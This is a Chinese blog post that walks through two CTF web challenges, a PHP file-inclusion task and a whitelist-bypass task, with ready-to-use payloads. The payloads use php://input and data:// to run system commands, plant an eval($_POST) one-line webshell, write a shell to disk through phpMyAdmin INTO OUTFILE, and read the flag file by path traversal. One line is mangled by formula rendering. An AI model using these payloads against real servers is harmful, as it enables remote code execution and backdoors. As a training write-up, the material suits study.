记录攻防世界web进阶

最新推荐文章于 2022-07-13 17:27:34 发布
最新推荐文章于 2022-07-13 17:27:34 发布
阅读量1.7k 收藏 2
点赞数 2
分类专栏: CTF技术 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/106627616
版权

Web_php_include

考点:考审计php代码的基本能力,以及绕开的能力
知识点:
1.两个函数
①str_replace(“php://”, “”, $page);替换函数

②strstr($page, “php://”)查找函数,即输出在一个字符串里面第一次出现的位置(且对大小写敏感)即绕开了
php://input功能应用 (接受请求的get或者post数据)
2.data协议的用法
3.数据库写马的方法

题目:
在这里插入图片描述
方法一:
利用strstr()的敏感大小进行绕过
代码

//get中
http://220.249.52.133:32881/?page=PHP://input
//post请求中## 标题
<?php system("ls"); ?> 
<?php system("cat 路径的文件名"); ?>//即利用cat命令获取

方法二:
data://伪协议执行命令利用进行绕过
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

<?php system("dir")?> base64编码后使用进行
http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJkaXIisssKT8%2b  (注意编码后的+号要URL编码)

方法三:
data://伪协议传木马

<?php eval($_POST[xiaohua]); ?> base64加密后拼接

http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==

//菜刀连接即可

方法四:
数据库写入马,利用数据库进行

//御剑扫描获得phpmyadmin root 密码空 进入

//数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写

SHOW VARIABLES LIKE "secure_file_priv"

linux默认tmp是可写目录 试试写入一句话马 菜刀连接 

SELECT "<?php eval(@$_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'

思路:①绕过代码审计中的替换即读取数据的命令
②在post中利用php的命令执行语句进行爆出flag

warmup

考点:

  1. 考php代码审计与构造的能力
  2. 考php路径访问的能力
  3. 参数与url中常见的符号理解
    知识点:
    1.#include文件包含的定义的漏洞使用类
    作用:包含并运行指定的文件
    运行方法:先按照参数的路径进行寻找,没有的话在依次删除路径
    file的参数这个是#include里面的定义为文件=路径;(且文件打开还可以考虑用php://input)
    2.函数
    ①in_array($page, $whitelist)即在whitelist中是否存在page这个参数
    ②mb_substr()函数的理解
mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
         );
 //即参数从0开始返回mb_strpos这么多的字节

③mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置(即返回的位置,strstr返回的是值且是从当时开始的值)

<?php
$str = 'http://www.feiniaomy.com';
echo mb_strpos($str,'niao');
?>
//输出结果:14;

④参数的理解
如?file=source.php?(payload)//即参数$page实际为source.php?

做题:
在这里插入图片描述
审计代码后发现只有当 p a g e 的 参 数 构 造 存 在 于 page的参数构造存在于 pagewhitelist数组中存在时,才返回 true,否则都是flase
因此可以利用第二个判断机制构造 p a g e = s o u r c e . p h p ? 或 者 page=source.php?或者 page=source.php?page=hint.php

然后又利用#include的实际执行方法进行构造路径
为?file=source.php?/…/…/…/…/…/…/ffffllllaaaagggg
成功获取到flag
在这里插入图片描述

goddemon
关注
专栏目录
攻防世界web进阶
weixin_54787877的博客
02-21 300
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
攻防世界 web高手进阶区 10分题 biscuiti-300
闵行小鱼塘
11-07 1042
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是biscuiti-300的writeup
[ 攻防世界 ] web进阶
Dannie01的博客
11-23 926
目的:练习做题手感和思路 CAT 搜索框搜索 弹出?url= 猜测是SSRF,所有协议均被过滤 http:// file:/// dict:// gopher:// 回归题目和描述,由CAT联想是命令执行,依然是 invalid url 思路切入点 invalid url => fuzz fuzz是我思路和实践弱项,积累 ?url=%88 宽字节,获取报错信息 html源码 复制粘贴本地查看 看到了熟悉的django报错页面,看来是将输入的参数传到了后端的django服务中进行解析,而d.
攻防世界 Web进阶(一)
未完成的歌~的博客
10-15 466
嗯..,终于把新手区的题做完了,感觉学到了不少东西( •̀ ω •́ )y 今天来记录进阶题 1、ics-06 2、PHP2 3、mfw
攻防世界 web进阶1
weixin_63231007的博客
03-30 247
003PHP2 通过index.phps查看源码得知: 代码审计得知,我们需要将传递的id,经过浏览器自动url解码,与urldecode()函数两次解码后等于admin,才可得到flag。使用burp_suite decoder模块 得知%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65两次url解码后为admin。将其传入id,得到flag。 004 Web_php_unserialize 首先看到源码,出现敏感函数wakeup,考虑绕过反序列化
攻防世界-Web(进阶区)
qwzf
09-05 594
前言 又做了几道攻防世界Web题,总结一下。 Web1:Cat 题目没提示。点开题目,以为是命令执行。然而几番尝试后,发现并不是。。。 其它也没什么提示,没思路了。偷瞄大佬博客 然后我开始复现,?url=%80产生报错,找到绝对路径。 从配置文件settings.py的报错中查看database的相关信息?url=@/opt/api/api/settings.py ?url=@/opt...
攻防世界 web高手进阶区 8分题 Web_python_block_chain
闵行小鱼塘
10-03 1570
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是Web_python_block_chain的writeup
攻防世界web解题[进阶](五)
weixin_46703850的博客
03-10 522
攻防世界web解题[进阶](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
攻防世界 web高手进阶区 10分题 Background_Management_System
闵行小鱼塘
10-21 1050
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Background_Management_System的writeup
CTF之一天一题:攻防世界web进阶之Cat
qq_42728977的博客
08-27 1574
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
asp MD5加密方式使用建议
10-29
根据MD5算法的特点,我们可以把MD5加密过程看作是一个函数调用过程,建议必须做如下方式修改,这样可以保证一定程度上你的网站用户和数据安全
攻防世界-WEB进阶篇(一)
weixin_42271850的博客
02-09 1724
简述 这是自己的第二篇博客,在上次学习了WEB的新手篇后,这次轮到WEB进阶篇的学习了。同样写下这个博客的目的也是督促自己再重新做一遍这些题目,因为第一次做的时候参考了很多的writeup,所以也想借此机会看一下自己学习的成果如何。 一、Training-WWW-Robots 从题目就能看到提示,应该是和Robots.txt文件相关的。直接在URL后面输入/robots.txt。 可...
攻防世界 web 进阶 Website
weixin_42499640的博客
08-13 657
打开网页 注册一个用户 使用注册的用户登陆 get flag 提示no admin, no flag XP 使用admin帐户才能得到flag 抓个包看看怎么改包能伪造admin 两个关键参数 username , csrftoken username是加密过的 csrftoken:为了防止跨站域请求伪造,有的网站请求中会加入这个验证,在登录及登录后续的操作都会让你携带csrftoken,问...
攻防世界-web进阶
楼阁de猫的博客
10-30 974
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界 web进阶 NewsCenter
weixin_43345082的博客
06-12 1482
看到这道题没什么头绪,扫完之后没有什么有用的信息 只有一个输入,试试sql 首先判断列,1’ order by 3# 有3列 首先去爆库 1’ union select 1,2,database()# 库是news,继续爆表 看到一个secret_table,爆他的列 1’ union select 1,2,column_name from information_schema.colum...
攻防世界-web进阶-supersqli
weixin_47346400的博客
02-26 168
wp传送门
攻防世界 web进阶区1
qq_61768489的博客
07-13 998
baby_web 题目描述:想想初始页面是哪个 那第一感觉就是index.php 然后在url里面输入后直接跳转到1.php,所以抓包试试,就出了 Training-WWW-Robots 直接查看robots协议 PHP2 上来就这个 ,啥也没有 信息收集,后缀index.phps ,出现源码 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); e..
攻防世界web进阶区 攻略
weixin_46329549的博客
03-22 650
进阶题前言:**1.isc-06**2.php23.baby_web**4.php-rce** 前言: web进阶区题目相对于新手区较难,此博客只是记录了一些比较重要或者 有代表性的题目,比较难的题暂时不会解,以后还会有补充。 1.isc-06 这道题用到了对id参数进行爆破。进入题目后看到url后存在参数id,使用各种注入方式后均没有爆破成功,最后使用bp对id参数进行爆破 进入报表中心,看到...
攻防世界-WEB进阶篇(二)
weixin_42271850的博客
07-05 295
简述 好久没有更新这个XCTF的题目了,现在过来更新一下。争取今年能够入门CTF的WEB方向。 一、PHP2 从题目就能看到提示,应该是和Robots.txt文件相关的。直接在URL后面输入/robots.txt。 可以看到提升我们网站中有fl0g.php这个文件。我们直接访问就能得到flag。 二、baby_web 题目描述想想初始页面是哪个,再结合点击的链接为http:/...
攻防世界web fileclude
最新发布
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值